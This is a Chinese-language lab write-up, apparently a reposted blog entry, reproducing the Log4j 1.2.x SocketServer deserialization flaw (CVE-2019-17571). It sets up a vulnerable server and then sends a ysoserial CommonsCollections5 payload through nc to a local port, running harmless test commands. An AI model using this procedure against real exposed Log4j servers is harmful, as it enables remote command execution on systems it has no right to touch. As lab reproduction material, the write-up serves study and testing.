Apache Log4j SocketServer反序列化漏洞复现(CVE-2019-17571)

信息

影响版本:1.2.4 <= Apache Log4j <= 1.2.17

时间:2019.12

复现环境:
① ubuntu + jdk 1.8
或者
② windows 10 + idea +jdk 1.8

复现版本:1.2.17

类型:命令执行

下载地址:
链接:https://pan.baidu.com/s/1NjdKwPSJc_vKUvfeYQNCLw 
提取码:zbh6

版本探测:没法探测

ubuntu下搭建

root@# java -cp log4j-1.2.17.jar:commons-collections-3.1.jar org.apache.log4j.net.SocketServer 4560 ./log4jserver.properties ./

或者利用windows的idea来搭建

1.新建maven项目
2.pom.xml添加依赖
<dependencies>

    <dependency>
        <groupId>log4j</groupId>
        <artifactId>log4j</artifactId>
        <version>1.2.17</version>
    </dependency>

    <dependency>
        <groupId>commons-collections</groupId>
        <artifactId>commons-collections</artifactId>
        <version>3.1</version>
    </dependency>
    </dependencies>
3.
新建java文件:test.java

import org.apache.log4j.Logger;
import org.apache.log4j.net.SimpleSocketServer;

public class test {
    private static final Logger log = Logger.getLogger(SimpleSocketServer.class);
    public static void main(String[] args) {
        System.out.println("start:");
        String[] argss = {"4560", "src/log4jserver.properties"};
        SimpleSocketServer.main(argss);
        log.info("succ");
    }
}
4.log4jserver.properties放到项目的src目录下

5.运行aaa.java,启动log4j

攻击

## ubuntu环境
root@# java -jar ysoserial-master.jar CommonsCollections5 "touch /tmp/suc cess" | nc 127.0.0.1 4560

## windows环境
root@# java -jar ysoserial-master.jar CommonsCollections5 "calc.exe" | nc 127.0.0.1 4560

Snipaste_2020-03-10_22-55-19.jpg

总结

鸡肋漏洞,建议不要复现了

猜你喜欢

转载自www.cnblogs.com/zaqzzz/p/12459999.html